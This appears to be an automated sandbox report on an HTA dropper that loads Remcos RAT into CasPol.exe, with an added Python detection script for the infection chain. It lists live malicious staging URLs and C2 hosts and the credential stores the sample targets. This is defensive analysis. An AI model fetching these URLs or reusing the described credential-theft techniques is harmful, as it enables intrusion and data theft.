                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: ESMTPPassword | 19_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword | 19_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword | 19_2_00402DB3

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: cmd.exe | 12_2_00405042
                    MITRE ATT&CK Matrix
                    
                    The matrix lists, per tactic column, the techniques in the order they appear in the report (top row to bottom row). A number in parentheses is the signature-hit badge shown next to that technique; techniques without a number had no matching signature for this sample.
                    
                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: Native API (21); Exploitation for Client Execution (1); Command and Scripting Interpreter (132); Service Execution (2); PowerShell (4); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: Scripting (111); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (322); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (322); Dynamic API Resolution
                    Credential Access: OS Credential Dumping (2); Input Capture (111); Credentials in Registry (2); Credentials In Files (3); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (49); Security Software Discovery (41); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (11); Input Capture (111); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Remote Access Software (2); Non-Application Layer Protocol (2); Application Layer Protocol (23); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1557815
Sample: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Start date: 18/11/2024
Architecture: WINDOWS
Score: 100

Top-level DNS/IP info: nextnewupdationsforu.duckdns.org (Uses dynamic DNS services); 15.164.165.52.in-addr.arpa; 15 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures

Process tree (graph node IDs in parentheses):
• mshta.exe (13): Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
  • powershell.exe (21): connects to 23.94.171.138 (ports 49705, 55648, 80; AS-COLOCROSSINGUS, United States); drops createthebestthing...tthingsformeeve.vbS (Unicode) and C:\Users\user\AppData\...\hzf3qrfx.cmdline (Unicode); Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    • wscript.exe (32): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
      • powershell.exe (42): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found
        • powershell.exe (47): connects to ip.1017.filemail.com (142.215.209.78; ports 443, 49706; HUMBER-COLLEGECA, Canada); Writes to foreign memory regions; Injects a PE file into a foreign processes
          • CasPol.exe (53): connects to nextnewupdationsforu.duckdns.org (192.227.228.36; ports 14645, 55649, 55650; AS-COLOCROSSINGUS, United States), geoplugin.net (178.237.33.50; ports 55651, 80; ATOM86-ASATOM86NL, Netherlands) and 127.0.0.1; Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Attempt to bypass Chrome Application-Bound Encryption; 8 other signatures
            • CasPol.exe (57): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
            • CasPol.exe (60): Tries to harvest and steal browser information (history, passwords, etc)
            • CasPol.exe (62)
            • 7 other processes (64)
              • msedge.exe (66)
        • conhost.exe (51)
    • powershell.exe (35): Loading BitLocker PowerShell Module
    • csc.exe (37): drops C:\Users\user\AppData\Local\...\hzf3qrfx.dll (PE32)
      • cvtres.exe (45)
    • conhost.exe (40)
• msedge.exe (16): contacts 239.255.255.250 (unknown, Reserved)
  • msedge.exe (26): connects to ssl.bingadsedgeextension-prod-europe.azurewebsites.net (94.245.104.56; ports 443, 55664; MICROSOFT-CORP-MSN-AS-BLOCKUS, United Kingdom), googlehosted.l.googleusercontent.com (172.217.16.193; ports 443, 55677; GOOGLEUS, United States), sb.scorecardresearch.com (18.244.18.27; ports 443, 55693; AMAZON-02US, United States); drops C:\Users\user\AppData\Local\...\Cookies (SQLite)
  • msedge.exe (28)
  • msedge.exe (30)
• svchost.exe (19)
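The process lineage in the graph above (mshta.exe spawning PowerShell, PowerShell relaying through wscript.exe back into PowerShell, and a final PowerShell stage injecting into CasPol.exe, which then beacons to the duckdns.org host and performs the geoplugin.net lookup) is the kind of chain a detection engineer hunts for in endpoint telemetry. The Python below is an added example written for this page; it is not Joe Sandbox's code and not the sample's own scripts. It runs over constructed Sysmon-style process-creation and network-connection events (hypothetical PIDs and image paths, with the benign Edge and interactive PowerShell entries added as controls) and flags the hops seen in the report. The rule names, the hypothetical `myhome.duckdns.org` control host and the 203.0.113.10 address are assumptions for illustration.

```python
"""Hunt for the execution chain and C2 pattern from the behavior graph above.

Sysmon-style process-creation (EID 1) and network-connection (EID 3) records
are modelled as dicts. The sample events below are constructed for this
example; PIDs and paths are hypothetical, not the report's own telemetry.
"""
from __future__ import annotations

# Indicators taken from the report; extend per environment.
DYNAMIC_DNS_SUFFIXES = (".duckdns.org",)
GEOIP_CHECKIN_HOSTS = {"geoplugin.net"}
INJECTION_HOSTS = {"caspol.exe"}        # .NET utility hosting the injected Remcos payload here
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe"}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (hypothetical PIDs).
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 110, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 120, "ppid": 110, "image": PS},
    {"pid": 130, "ppid": 120, "image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 140, "ppid": 130, "image": PS},
    {"pid": 150, "ppid": 140, "image": PS},
    {"pid": 160, "ppid": 150, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"},
    {"pid": 210, "ppid": 100, "image": PS},   # interactive admin PowerShell, benign control
]
NETWORK_EVENTS = [
    {"pid": 160, "dest_host": "nextnewupdationsforu.duckdns.org", "dest_ip": "192.227.228.36", "dest_port": 14645},
    {"pid": 160, "dest_host": "geoplugin.net", "dest_ip": "178.237.33.50", "dest_port": 80},
    {"pid": 200, "dest_host": "sb.scorecardresearch.com", "dest_ip": "18.244.18.27", "dest_port": 443},
    {"pid": 210, "dest_host": "myhome.duckdns.org", "dest_ip": "203.0.113.10", "dest_port": 443},  # hypothetical benign dyn-DNS use
]


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_ancestry(process_events: list[dict]) -> dict[int, list[str]]:
    """Map each PID to its image lineage [self, parent, grandparent, ...]."""
    by_pid = {e["pid"]: e for e in process_events}
    lineage = {}
    for pid in by_pid:
        chain, cur, seen = [], pid, set()
        while cur in by_pid and cur not in seen:   # stop at the root or on a PID-reuse loop
            seen.add(cur)
            chain.append(_basename(by_pid[cur]["image"]))
            cur = by_pid[cur]["ppid"]
        lineage[pid] = chain
    return lineage


def hunt(process_events: list[dict], network_events: list[dict]) -> list[dict]:
    """Return findings for the script host -> PowerShell -> CasPol.exe -> dynamic-DNS pattern."""
    lineage = build_ancestry(process_events)
    findings, flagged = [], set()
    for e in process_events:
        chain = lineage[e["pid"]]
        me = chain[0]
        parent = chain[1] if len(chain) > 1 else ""
        # Hop 1: a script host (mshta.exe / wscript.exe) directly launching PowerShell.
        if me == "powershell.exe" and parent in SCRIPT_HOSTS:
            findings.append({"pid": e["pid"], "rule": "script-host-spawns-powershell", "chain": chain})
            flagged.add(e["pid"])
        # Hop 2: a .NET utility with no business being a child of PowerShell (the injection host).
        if me in INJECTION_HOSTS and "powershell.exe" in chain[1:]:
            findings.append({"pid": e["pid"], "rule": "powershell-spawns-injection-host", "chain": chain})
            flagged.add(e["pid"])
    for n in network_events:
        if n["pid"] not in flagged:
            continue   # dynamic DNS alone is too noisy; require a suspicious lineage first
        host = n["dest_host"].lower()
        if host.endswith(DYNAMIC_DNS_SUFFIXES):
            findings.append({"pid": n["pid"], "rule": "dynamic-dns-c2", "host": host, "port": n["dest_port"]})
        if host in GEOIP_CHECKIN_HOSTS:
            findings.append({"pid": n["pid"], "rule": "geoip-checkin", "host": host, "port": n["dest_port"]})
    return findings


if __name__ == "__main__":
    for f in hunt(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f["pid"], f["rule"], f.get("chain") or f.get("host"))
```

The hunt keys on lineage first and only then on destinations, because the URL reputation columns further down show why destination reputation alone is not enough here: the staging URLs on 23.94.171.138 are marked malicious by the analysis while Avira URL Cloud rates them safe. The interactive PowerShell control (pid 210) talking to a dynamic-DNS host is deliberately not flagged; drop the `flagged` gate if your environment has no legitimate dynamic-DNS traffic and you want that lower-confidence hit too.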

Initial Sample (Source | Detection | Scanner | Label):
seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | 22% | ReversingLabs | Script-JS.Trojan.Acsogenixx

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://23.94.171.138/329/createt | 0% | Avira URL Cloud | safe
http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF | 0% | Avira URL Cloud | safe
http://23.94.171.138/329/FRSSDE.txt | 0% | Avira URL Cloud | safe
http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF5 | 0% | Avira URL Cloud | safe
https://tunnel-staging.googlezip.net/2 | 0% | Avira URL Cloud | safe
https://aka..FT_ | 0% | Avira URL Cloud | safe
http://tls-tunnel-check.googlezip.net/connect2 | 0% | Avira URL Cloud | safe
nextnewupdationsforu.duckdns.org | 100% | Avira URL Cloud | malware
http://23.94.171.138/ | 0% | Avira URL Cloud | safe
https://googleusercontent.comb | 0% | Avira URL Cloud | safe
https://www.privacysandbox.comb | 0% | Avira URL Cloud | safe
http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEM | 0% | Avira URL Cloud | safe
Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
geoplugin.net | 178.237.33.50 | true | false | - | high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | - | high
sb.scorecardresearch.com | 18.244.18.27 | true | false | - | high
ip.1017.filemail.com | 142.215.209.78 | true | false | - | high
nextnewupdationsforu.duckdns.org | 192.227.228.36 | true | true | - | unknown
googlehosted.l.googleusercontent.com | 172.217.16.193 | true | false | - | high
sni1gl.wpc.nucdn.net | 152.199.21.175 | true | false | - | high
clients2.googleusercontent.com | unknown | unknown | false | - | high
bzib.nelreports.net | unknown | unknown | false | - | high
assets.msn.com | unknown | unknown | false | - | high
15.164.165.52.in-addr.arpa | unknown | unknown | true | - | unknown
c.msn.com | unknown | unknown | false | - | high
ntp.msn.com | unknown | unknown | false | - | high
api.msn.com | unknown | unknown | false | - | high
1017.filemail.com | unknown | unknown | false | - | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF | true | Avira URL Cloud: safe | unknown
http://23.94.171.138/329/FRSSDE.txt | true | Avira URL Cloud: safe | unknown
nextnewupdationsforu.duckdns.org | true | Avira URL Cloud: malware | unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f | false | - | high
http://geoplugin.net/json.gp | false | - | high
URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://23.94.171.138/329/createt | powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/coacbE | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF5 | powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://1017.filemail.com | powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka..FT_ | powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000003.00000002.1476840604.000000000510D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com | CasPol.exe | false | - | high
http://crl.microso | powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp/C | powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-safebrowsing.fastly-edge.com/b | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://login.yahoo.com/config/login | CasPol.exe | false | - | high
http://www.microsoft.c | powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.nirsoft.net/ | CasPol.exe | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926 | chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-query.fastly-edge.com/2P | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nonexistent.googlezip.net/ | chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://googleusercontent.comb | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S | powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://tunnel-staging.googlezip.net/2 | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-query.fastly-edge.com/7 | chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/chromesuggestionsJK | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.imvu.com | CasPol.exe | false | - | high
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://dns-tunnel-check.googlezip.net/connect2 | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Vs | chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_An | chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.google.com/chrome/?p=blockedb | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://tls-tunnel-check.googlezip.net/connect2 | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://google-ohttp-relay-query.fastly-edge.com/BiddingAndScoringDebugReportingAPIKAnonymityService | chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://lens.google.com/v3/2 | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nonexistent.googlezip.net/b | chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-query.fastly-edge.com/ | chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://google-ohttp-relay-join.fastly-edge.com/ | chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://23.94.171.138/ | powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000001.00000002.1588165227.0000000003286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1920551053.0000000007460000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                                                                                                                                      https://www.privacysandbox.combchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/2Jchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
